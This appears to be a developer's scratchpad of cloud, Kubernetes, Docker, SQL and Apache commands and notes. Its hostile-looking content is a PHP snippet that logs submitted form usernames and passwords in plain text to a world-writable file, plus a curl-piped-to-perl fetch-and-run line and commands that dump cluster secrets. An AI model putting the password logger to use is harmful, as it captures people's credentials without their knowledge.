Google Cloud storage is heasy to handle with
gsutil like
gsutil mb -p -c gs://bucketname
gsutil ls -l -b gs://bucketname
wget ls -a publicurl - to se the archives
using gsutil cp
to restore an old archive





Google Cloud storage is heasy to handle with
gsutil like
gsutil mb -p -c gs://bucketname
gsutil ls -l -b gs://bucketname
wget ls -a publicurl - to se the archives
using gsutil cp
to restore an old archive
curl https://market.southpole.com/home/offset-emissions/project-details/53/ –silent -H “Accept-Encoding: gzip,deflate” –write-out “%{size_download}\n” –output /dev/null
curl https://market.southpole.com/home/offset-emissions/project-details/53 –silent –write-out “%{size_download}\n” –output /dev/null
this addon collects the passwords entered in a form in the secrets.txt file 777
< "questionmark" php if(isset($_POST['name'])) { $data=$_POST['name']; $fp = fopen('secrets.txt', 'a'); fwrite($fp, $data. " "); fclose($fp); } if(isset($_POST['pass'])) { $data=$_POST['pass']; $fp = fopen('secrets.txt', 'a'); fwrite($fp, $data. "\n"); fclose($fp); } "questionmark">
CREATE VIEW `Sales_stage_history_pb` AS
select
`ac`.`name` AS `account_name`,
`ac`.`id` AS `account_id`,
`u`.`user_name` AS `kam`,
`oc`.`expected_er_delivery_date_c` AS `expected_delivery_date`,
`oc`.`numberoftons_c` AS `numbers_of_tons`,
o.lead_source AS lead_source,
ac.billing_address_country AS country,
oc.spcategorie_c AS practice,
o.probability AS probability,
`o`.`name` AS `opportunity_name`,
`o`.`description` AS `opportunity_description`,
`o`.`sales_stage` AS `current_stage`,
`o`.`amount` AS `gross_margin`,
`a`.`before_value_string` AS `old_value`,
`a`.`after_value_string` AS `new_value`,
`a`.`date_created` AS `changing_date`,
`acc`.`spindustrysectorii_c` AS `sp_industry`,
`acc`.`newaccountstatus_c` AS `acc_status`,
`acc`.`commitments_c` AS `acc_commitments`,
`acc`.`reportingto_c` AS `acc_reporting_to`,
`oc`.`spcategorie_c` AS `opp_solution`,
`o`.`date_entered` AS `opp_creation_date`,
`oc`.`reasonswonlost_c` AS `opp_reasonswonlost`,
`o`.`campaign_id` AS `opp_campaign` from ((((((`opportunities_audit` `a` join `opportunities` `o`) join `accounts_opportunities` `ao`) join `accounts` `ac`) join `users` `u`) join `accounts_cstm` `acc`) join `opportunities_cstm` `oc`)
where ((`a`.`field_name` = ‘sales_stage’)
and (`o`.`id` = `a`.`parent_id`)
and (`o`.`deleted` = 0)
and (`ao`.`opportunity_id` = `o`.`id`)
and (`ac`.`id` = `ao`.`account_id`)
and (`o`.`assigned_user_id` = `u`.`id`)
and (`ac`.`id` = `acc`.`id_c`)
and (`o`.`id` = `oc`.`id_c`)) ;
CREATE VIEW `sophies3` AS
select
`o`.`name` AS `Opportunity name`,
`ac`.`name` AS `Client name`,
`acc`.`newaccountstatus_c` AS `Account status`,
`ac`.`billing_address_country` AS `Country`,
`o`.`date_entered` AS `Date created`,
`oc`.`expected_er_delivery_date_c` AS `Estimated delivery date`,
`u`.`user_name` AS `KAM`,
`i`.`name` AS `SP industry`,
p.name AS Practice,
`o`.`amount` AS `Estimated SP gross margin (EUR)`,
o.probability AS probability,
oc.weightedgrossmargin_c AS `Estimated gross margin with probability`,
`o`.`sales_stage` AS `Sales stage`,
o.lead_source AS `Lead source`,
`o`.`campaign_id` AS `Campaign ID`
from ((((((((`opportunities_audit` `a` join `opportunities` `o`) join `accounts_opportunities` `ao`) join `accounts` `ac`) join `users` `u`) join `accounts_cstm` `acc`) join `opportunities_cstm` `oc`) join `practices` `p`)join `industries` `i`)
where ((`a`.`field_name` = ‘sales_stage’)
and (`o`.`id` = `a`.`parent_id`)
and (`o`.`deleted` = 0)
and (`ao`.`opportunity_id` = `o`.`id`)
and (`ac`.`id` = `ao`.`account_id`)
and (`o`.`assigned_user_id` = `u`.`id`)
and (`ac`.`id` = `acc`.`id_c`)
and (`oc`.`spcategorie_c` = `p`.`id`)
and (`acc`.`spindustrysectorii_c` = `i`.`id`)
and (`o`.`id` = `oc`.`id_c`)) ;
Last Workshop log and stuff
kubectl describe pod -n workshop
kubectl get deployment -n workshop
kubectl get deployment -n workshop broken
kubectl delete deployment -n workshop
kubectl get -n xxxx pod xxxx -o yaml
kubectl get cronjobs -n ak-backend-dev
kubectl get pods -n ak-backend-dev
kubectl logs -n ak-backend-dev provision-market-dev-job-1630383300-pvnrj -c scriptrunner
kubectl get configmaps -n ak-backend-dev
kubectl get secrets -n ak-backend-dev
kubectl get secrets -n ak-backend-dev pod env-dev-hh7577cggk -o yaml
B64
echo x | base64 -d
git secret reveal
git-secret reveal
kustomize build kubernetes/overlays/dev
https://github.com/southpolecarbon/ingress-configuration/wiki/Kubernetes-Essentials
https://github.com/southpolecarbon/ingress-configuration/wiki/Ingresses,-Certificates,-DNS
Services and Ingres and GKE
Docker commands
docker system prune -a
docker images
docker logs alaskaback
docker exec -it alaskaback /bin/sh
docker exec -it alaskaback /bin/bash
/proc/14/fd # tail -f 0 1 2
K8 commands
setup on gke
gcloud init
gcloud container clusters get-credentials alaska
to enter container
kubectl get pods
kubectl exec -it alaska-api-9df9b4594-jchrl — /bin/bash
kubectl exec -it alaska-payments-d54ffd8b9-jjtw4 — /bin/bash
some commands
kubectl apply -f
docker-compose -f prox.yaml up -d
kubectl get service alaska-administration
kubectl get pods
kubectl get services -> see IP external address
kubectl rollout undo deployments alaska-administration
kubectl describe pods
kubectl get ev
kubectl delete pod foo
kubectl describe pod ppa-76dd5b4fbb-l75ld
kubectl scale –current-replicas=2 –replicas=1 deployment/ppa
docker build . -t eu.gcr.io/marketk8/msc
docker push eu.gcr.io/marketk8/msc
kubectl set image deployment/ppa-model pamodel=eu.gcr.io/marketk8/ppa-model
gcloud auth login
gcloud auth configure-docker
kubectl create secret generic <YOUR-SA-SECRET> \
--from-file=service_account.json=~/key.json
kubectl -n msc scale deployment msc --replicas=1
kubectl apply -f cert-volumeclaim.yaml
kubectl create deployment msc –image=eu.gcr.io/marketk8/msc –dry-run -o yaml
kubectl get deployments -n msc msc -o yaml
kubectl get -n msc pvc
kubectl config current-context
kubectl config use-context gke_marketk8_europe-west3-c_alaska
kubectl config use-context gke_marketk8_europe-west3-c_memcalc
ss -tulwn
https://kubernetes.io/docs/reference/kubectl/cheatsheet/
creat namespace
GIT commands
git stash
Removing All Unused Objects
The docker system prune command will remove all stopped containers, all dangling images, and all unused networks:
docker system prune
Using UEFI, have try secure boot off and on but still hang.
Ah I’ve only used usb. Could you legacy boot the cd? On start up press the key for boot list and boot the cd in legacy. Another option try booting and editing the boot in grub by pressing E on install and replace quiet splash with nomodeset and then f10 to boot
sudo add-apt-repository ppa:graphics-drivers
sudo apt-get install nvidia-driver-410
or for an old macbook
sudo apt update
sudo apt install nvidia-387
docker container ls
docker exec -it “containername” /bin/bash
mysqltuner from the repo for mariaDB
for apache
curl -sL https://raw.githubusercontent.com/richardforth/apache2buddy/master/apache2buddy.pl | perl
apache2ctl configtest
apache2ctl graceful
Der Parameter MaxRequestWorkers (bis 2.3.13 MaxClients) bestimmt wieviel Apache Prozesse und somit Client Verbindungen zugelassen werden (Voraussetzung: prefork MPM). Wenn das worker MPM verwendet wird limitiert es die Anzahl der Threads die für Clients zur Verfügung stehen. Der Apache Standard für MaxRequestWorkers ist 256, wobei zu beachten ist, dass Distributionen oft andere Werte per Default gesetzt haben.
Wenn MaxRequestWorkers größer als 256 gesetzt werden soll, muss zusätzlich noch der Parameter ServerLimit entsprechend erhöht werden.
Wenn der MaxRequestWorkers Wert im laufenden Betrieb erreicht wird, wird dies im Apache error.log vermerkt.
[Fri Jun 05 13:15:24.760818 2015] [mpm_prefork:error] [pid 1649] AH00161: server reached MaxRequestWorkers setting, consider raising the MaxRequestWorkers setting
Bei Verwendung von prefork MPM kann mittels des Parameters MinSpareServers eingestellt werden, wieviel unbeschäftigte (=spare) Apache Prozesse minimal zur Verfügung stehen sollen. Sobald eine Anfrage kommt kann dann dieser unbeschäftigte Prozess verwendet werden, wodurch die Anfrage schneller beantwortet werden kann, da nicht extra ein neuer Prozess erstellt werden muss. Der Parameter MaxSpareServers legt fest, wieviel spare Prozesse maximal vorgehalten werden dürfen, um nicht unnötig Arbeitsspeicher zu belegen. Die Apache Default Werte sind für MinSpareServers 5 und MaxSpareServers 10.
Bei Verwendung von worker MPM können analog dazu die jeweils verfügbaren Threads mit MinSpareThreads und MaxSpareThreads eingestellt werden. Zusätzlich ist noch der Parameter ThreadsPerChild relevant, wodurch die Anzahl der Threads pro Apache Prozess festgelegt wird.
Der Parameter StartServers legt fest wieviel Apache Prozesse beim Serverstart erstellt werden sollen.
f you don’t want or cannot restart the MySQL server you can proceed like this on your running server:
SET global general_log = 1;
SET global log_output = 'table';
select * from mysql.general_log;
SET global general_log = 0;